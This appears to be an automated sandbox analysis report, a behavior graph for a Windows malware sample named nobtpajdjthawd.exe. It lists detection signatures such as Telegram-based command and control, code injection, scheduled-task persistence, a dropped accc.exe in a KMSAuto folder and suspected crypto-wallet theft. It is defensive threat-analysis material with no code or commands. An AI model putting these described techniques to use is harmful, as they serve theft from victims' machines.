            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1635473 Sample: nobtpajdjthawd.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 46 api.telegram.org 2->46 52 Suricata IDS alerts for network traffic 2->52 54 Antivirus / Scanner detection for submitted sample 2->54 56 Multi AV Scanner detection for submitted file 2->56 60 4 other signatures 2->60 9 nobtpajdjthawd.exe 2->9         started        12 accc.exe 2->12         started        signatures3 58 Uses the Telegram API (likely for C&C communication) 46->58 process4 signatures5 62 Contains functionality to inject code into remote processes 9->62 64 Uses schtasks.exe or at.exe to add and modify task schedules 9->64 66 Injects a PE file into a foreign processes 9->66 14 nobtpajdjthawd.exe 16 9 9->14         started        19 WerFault.exe 21 16 9->19         started        68 Antivirus detection for dropped file 12->68 21 accc.exe 14 2 12->21         started        23 WerFault.exe 12->23         started        process6 dnsIp7 48 api.telegram.org 149.154.167.220, 443, 49718, 49724 TELEGRAMRU United Kingdom 14->48 42 C:\ProgramData\KMSAuto\accc.exe, PE32 14->42 dropped 44 C:\Users\user\...\nobtpajdjthawd.exe.log, ASCII 14->44 dropped 50 Found many strings related to Crypto-Wallets (likely being stolen) 14->50 25 accc.exe 14->25         started        28 cmd.exe 1 14->28         started        30 schtasks.exe 1 14->30         started        file8 signatures9 process10 signatures11 70 Injects a PE file into a foreign processes 25->70 32 accc.exe 1 25->32         started        34 WerFault.exe 25->34         started        36 conhost.exe 28->36         started        38 timeout.exe 1 28->38         started        40 conhost.exe 30->40         started        process12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.